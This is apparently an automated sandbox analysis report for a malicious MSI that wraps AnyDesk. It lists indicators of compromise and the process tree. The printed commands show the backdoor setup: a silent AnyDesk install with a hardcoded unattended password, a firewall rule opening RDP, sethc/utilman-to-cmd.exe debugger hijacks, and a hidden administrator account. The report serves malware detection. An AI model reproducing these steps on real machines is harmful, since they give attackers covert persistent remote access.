fb9f0bf2b71bf576053c56cb913ea4e93581fc9d3aa9d6d8a0ae572a1622f050

Analysis

max time kernel
90s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
05-08-2022 16:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.msi
Size

3.9MB
MD5

6cf5ad7a7d1b7bab0c62e246cf41a985
SHA1

b06a03adc550ead96534f5e723395c4e16bfdf44
SHA256

fb9f0bf2b71bf576053c56cb913ea4e93581fc9d3aa9d6d8a0ae572a1622f050
SHA512

46cd8bd1ead75a8adb7d5bff81a2fdc04567d462e965664f6f9f796237839f07f74d2201c3da8f7f37c9dfc45749ed88708db5a216d84f7ac146e5af58a8608e

Score

8^/10

discovery evasion persistence

Malware Config

Signatures

Executes dropped EXE 6 IoCs

Processes:

install.exeanydesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeanydesk.exe

pid process

1604 install.exe
4960 anydesk.exe
2008 AnyDesk.exe
4936 AnyDesk.exe
4532 AnyDesk.exe
528 anydesk.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

1288 netsh.exe

pid	process
1604	install.exe
4960	anydesk.exe
2008	AnyDesk.exe
4936	AnyDesk.exe
4532	AnyDesk.exe
528	anydesk.exe

pid	process
1288	netsh.exe

Sets file execution options in registry 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

install.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "c:\\windows\\system32\\cmd.exe"	install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "c:\\windows\\system32\\cmd.exe"	install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger = "c:\\windows\\system32\\cmd.exe"	install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe\Debugger = "c:\\windows\\system32\\cmd.exe"	install.exe

Loads dropped DLL 4 IoCs

Processes:

MsiExec.exeMsiExec.exe

pid process

4212 MsiExec.exe
4740 MsiExec.exe
4740 MsiExec.exe
4212 MsiExec.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

ICACLS.EXEICACLS.EXE

pid process

4384 ICACLS.EXE
3528 ICACLS.EXE
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
4212	MsiExec.exe
4740	MsiExec.exe
4740	MsiExec.exe
4212	MsiExec.exe

pid	process
4384	ICACLS.EXE
3528	ICACLS.EXE

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

install.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	install.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administartor = "0"	install.exe

Drops file in System32 directory 1 IoCs

Processes:

install.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\log1.txt install.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\log1.txt	install.exe

Drops file in Windows directory 14 IoCs

Processes:

msiexec.exeEXPAND.EXE

description	ioc	process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDCC.tmp	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE
File opened for modification	C:\Windows\Installer\MSIB7AB.tmp	msiexec.exe
File created	C:\Windows\Installer\e570c18.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e570c16.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{AC4583F8-6694-473E-BB77-32CDFC9BA940}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDBB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI155F.tmp	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File created	C:\Windows\Installer\e570c16.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB6D0.tmp	msiexec.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000024aabe40d3e837210000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000024aabe400000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff00000000070001000068090024aabe40000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000024aabe4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000024aabe4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Modifies data under HKEY_USERS 10 IoCs

Processes:

MsiExec.exemsiexec.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\ForegroundLockTimeout = "200000"	MsiExec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\ForegroundLockTimeout = "0"	MsiExec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MsiExec.exe

Modifies registry class 38 IoCs

Processes:

msiexec.exeanydesk.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\",0"	anydesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open	anydesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" \"%1\""	anydesk.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0"	anydesk.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open	anydesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell	anydesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Language = "1033"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon	anydesk.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell	anydesk.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command	anydesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" --play \"%1\""	anydesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\27DCDF205199E0345B6F51FFDC229E64\8F3854CA4966E374BB7723DCCFB99A04	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\PackageName = "1.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk	anydesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk	anydesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon	anydesk.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Version = "458752"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8F3854CA4966E374BB7723DCCFB99A04\ProductFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\ProductName = "Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\PackageCode = "3FB72BC8CB959144EB519E3E5854F372"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\27DCDF205199E0345B6F51FFDC229E64	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol"	anydesk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol	anydesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command	anydesk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8F3854CA4966E374BB7723DCCFB99A04	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList	msiexec.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

msiexec.exeanydesk.exeAnyDesk.exeAnyDesk.exe

pid process

2228 msiexec.exe
2228 msiexec.exe
4960 anydesk.exe
4960 anydesk.exe
2008 AnyDesk.exe
2008 AnyDesk.exe
4532 AnyDesk.exe
4532 AnyDesk.exe

pid	process
2228	msiexec.exe
2228	msiexec.exe
4960	anydesk.exe
4960	anydesk.exe
2008	AnyDesk.exe
2008	AnyDesk.exe
4532	AnyDesk.exe
4532	AnyDesk.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exeinstall.exesrtasks.exe

description	pid	process
Token: SeShutdownPrivilege	4680	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4680	msiexec.exe
Token: SeSecurityPrivilege	2228	msiexec.exe
Token: SeCreateTokenPrivilege	4680	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4680	msiexec.exe
Token: SeLockMemoryPrivilege	4680	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4680	msiexec.exe
Token: SeMachineAccountPrivilege	4680	msiexec.exe
Token: SeTcbPrivilege	4680	msiexec.exe
Token: SeSecurityPrivilege	4680	msiexec.exe
Token: SeTakeOwnershipPrivilege	4680	msiexec.exe
Token: SeLoadDriverPrivilege	4680	msiexec.exe
Token: SeSystemProfilePrivilege	4680	msiexec.exe
Token: SeSystemtimePrivilege	4680	msiexec.exe
Token: SeProfSingleProcessPrivilege	4680	msiexec.exe
Token: SeIncBasePriorityPrivilege	4680	msiexec.exe
Token: SeCreatePagefilePrivilege	4680	msiexec.exe
Token: SeCreatePermanentPrivilege	4680	msiexec.exe
Token: SeBackupPrivilege	4680	msiexec.exe
Token: SeRestorePrivilege	4680	msiexec.exe
Token: SeShutdownPrivilege	4680	msiexec.exe
Token: SeDebugPrivilege	4680	msiexec.exe
Token: SeAuditPrivilege	4680	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4680	msiexec.exe
Token: SeChangeNotifyPrivilege	4680	msiexec.exe
Token: SeRemoteShutdownPrivilege	4680	msiexec.exe
Token: SeUndockPrivilege	4680	msiexec.exe
Token: SeSyncAgentPrivilege	4680	msiexec.exe
Token: SeEnableDelegationPrivilege	4680	msiexec.exe
Token: SeManageVolumePrivilege	4680	msiexec.exe
Token: SeImpersonatePrivilege	4680	msiexec.exe
Token: SeCreateGlobalPrivilege	4680	msiexec.exe
Token: SeBackupPrivilege	5032	vssvc.exe
Token: SeRestorePrivilege	5032	vssvc.exe
Token: SeAuditPrivilege	5032	vssvc.exe
Token: SeBackupPrivilege	2228	msiexec.exe
Token: SeRestorePrivilege	2228	msiexec.exe
Token: SeRestorePrivilege	2228	msiexec.exe
Token: SeTakeOwnershipPrivilege	2228	msiexec.exe
Token: SeRestorePrivilege	2228	msiexec.exe
Token: SeTakeOwnershipPrivilege	2228	msiexec.exe
Token: SeRestorePrivilege	2228	msiexec.exe
Token: SeTakeOwnershipPrivilege	2228	msiexec.exe
Token: SeRestorePrivilege	2228	msiexec.exe
Token: SeTakeOwnershipPrivilege	2228	msiexec.exe
Token: SeRemoteShutdownPrivilege	1604	install.exe
Token: SeBackupPrivilege	4716	srtasks.exe
Token: SeRestorePrivilege	4716	srtasks.exe
Token: SeSecurityPrivilege	4716	srtasks.exe
Token: SeTakeOwnershipPrivilege	4716	srtasks.exe
Token: SeBackupPrivilege	4716	srtasks.exe
Token: SeRestorePrivilege	4716	srtasks.exe
Token: SeSecurityPrivilege	4716	srtasks.exe
Token: SeTakeOwnershipPrivilege	4716	srtasks.exe
Token: SeRestorePrivilege	2228	msiexec.exe
Token: SeTakeOwnershipPrivilege	2228	msiexec.exe
Token: SeRestorePrivilege	2228	msiexec.exe
Token: SeTakeOwnershipPrivilege	2228	msiexec.exe
Token: SeRestorePrivilege	2228	msiexec.exe
Token: SeTakeOwnershipPrivilege	2228	msiexec.exe
Token: SeRestorePrivilege	2228	msiexec.exe
Token: SeTakeOwnershipPrivilege	2228	msiexec.exe
Token: SeRestorePrivilege	2228	msiexec.exe
Token: SeTakeOwnershipPrivilege	2228	msiexec.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

msiexec.exeAnyDesk.exe

pid process

4680 msiexec.exe
4936 AnyDesk.exe
4936 AnyDesk.exe
4936 AnyDesk.exe
4680 msiexec.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

AnyDesk.exe

pid process

4936 AnyDesk.exe
4936 AnyDesk.exe
4936 AnyDesk.exe

pid	process
4680	msiexec.exe
4936	AnyDesk.exe
4936	AnyDesk.exe
4936	AnyDesk.exe
4680	msiexec.exe

pid	process
4936	AnyDesk.exe
4936	AnyDesk.exe
4936	AnyDesk.exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

msiexec.exeMsiExec.exeinstall.execmd.execmd.exeMsiExec.exe

description	pid	process	target process
PID 2228 wrote to memory of 4716	2228	msiexec.exe	srtasks.exe
PID 2228 wrote to memory of 4716	2228	msiexec.exe	srtasks.exe
PID 2228 wrote to memory of 4212	2228	msiexec.exe	MsiExec.exe
PID 2228 wrote to memory of 4212	2228	msiexec.exe	MsiExec.exe
PID 2228 wrote to memory of 4212	2228	msiexec.exe	MsiExec.exe
PID 2228 wrote to memory of 4740	2228	msiexec.exe	MsiExec.exe
PID 2228 wrote to memory of 4740	2228	msiexec.exe	MsiExec.exe
PID 2228 wrote to memory of 4740	2228	msiexec.exe	MsiExec.exe
PID 4740 wrote to memory of 4384	4740	MsiExec.exe	ICACLS.EXE
PID 4740 wrote to memory of 4384	4740	MsiExec.exe	ICACLS.EXE
PID 4740 wrote to memory of 4384	4740	MsiExec.exe	ICACLS.EXE
PID 4740 wrote to memory of 5008	4740	MsiExec.exe	EXPAND.EXE
PID 4740 wrote to memory of 5008	4740	MsiExec.exe	EXPAND.EXE
PID 4740 wrote to memory of 5008	4740	MsiExec.exe	EXPAND.EXE
PID 4740 wrote to memory of 1604	4740	MsiExec.exe	install.exe
PID 4740 wrote to memory of 1604	4740	MsiExec.exe	install.exe
PID 4740 wrote to memory of 1604	4740	MsiExec.exe	install.exe
PID 1604 wrote to memory of 2596	1604	install.exe	cmd.exe
PID 1604 wrote to memory of 2596	1604	install.exe	cmd.exe
PID 1604 wrote to memory of 2596	1604	install.exe	cmd.exe
PID 2596 wrote to memory of 4960	2596	cmd.exe	anydesk.exe
PID 2596 wrote to memory of 4960	2596	cmd.exe	anydesk.exe
PID 2596 wrote to memory of 4960	2596	cmd.exe	anydesk.exe
PID 1604 wrote to memory of 3732	1604	install.exe	cmd.exe
PID 1604 wrote to memory of 3732	1604	install.exe	cmd.exe
PID 1604 wrote to memory of 3732	1604	install.exe	cmd.exe
PID 3732 wrote to memory of 1308	3732	cmd.exe	cmd.exe
PID 3732 wrote to memory of 1308	3732	cmd.exe	cmd.exe
PID 3732 wrote to memory of 1308	3732	cmd.exe	cmd.exe
PID 3732 wrote to memory of 4532	3732	cmd.exe	AnyDesk.exe
PID 3732 wrote to memory of 4532	3732	cmd.exe	AnyDesk.exe
PID 3732 wrote to memory of 4532	3732	cmd.exe	AnyDesk.exe
PID 1604 wrote to memory of 528	1604	install.exe	anydesk.exe
PID 1604 wrote to memory of 528	1604	install.exe	anydesk.exe
PID 1604 wrote to memory of 528	1604	install.exe	anydesk.exe
PID 1604 wrote to memory of 1288	1604	install.exe	netsh.exe
PID 1604 wrote to memory of 1288	1604	install.exe	netsh.exe
PID 1604 wrote to memory of 1288	1604	install.exe	netsh.exe
PID 4740 wrote to memory of 3528	4740	MsiExec.exe	ICACLS.EXE
PID 4740 wrote to memory of 3528	4740	MsiExec.exe	ICACLS.EXE
PID 4740 wrote to memory of 3528	4740	MsiExec.exe	ICACLS.EXE
PID 4212 wrote to memory of 2040	4212	MsiExec.exe	cmd.exe
PID 4212 wrote to memory of 2040	4212	MsiExec.exe	cmd.exe
PID 4212 wrote to memory of 2040	4212	MsiExec.exe	cmd.exe

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4680

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4716

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F209592F75EACBCB8A295D511C0C2B32
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files"
3⤵
PID:2040

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D2CC458D3D4E53F0CCE4C0795C4D02B0 E Global\MSI0000
2⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4740

C:\Windows\SysWOW64\ICACLS.EXE
"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
3⤵
- Modifies file permissions
PID:4384

C:\Windows\SysWOW64\EXPAND.EXE
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
3⤵
- Drops file in Windows directory
PID:5008

C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files\install.exe
"C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files\install.exe"
3⤵
- Executes dropped EXE
- Sets file execution options in registry
- Modifies WinLogon
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\SysWOW64\cmd.exe
cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
4⤵
- Suspicious use of WriteProcessMemory
PID:2596

\??\c:\programdata\anydesk.exe
c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
5⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4960

C:\Windows\SysWOW64\cmd.exe
cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password
4⤵
- Suspicious use of WriteProcessMemory
PID:3732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"
5⤵
PID:1308

\??\c:\programdata\anydesk\AnyDesk.exe
c:\programdata\anydesk\anydesk.exe --set-password
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4532

\??\c:\programdata\anydesk\anydesk.exe
"c:\programdata\anydesk\anydesk.exe" --get-id
4⤵
- Executes dropped EXE
PID:528

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
4⤵
- Modifies Windows Firewall
PID:1288

C:\Windows\SysWOW64\ICACLS.EXE
"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\." /SETINTEGRITYLEVEL (CI)(OI)LOW
3⤵
- Modifies file permissions
PID:3528

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:5032

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --service
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2008

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --control
1⤵
- Executes dropped EXE
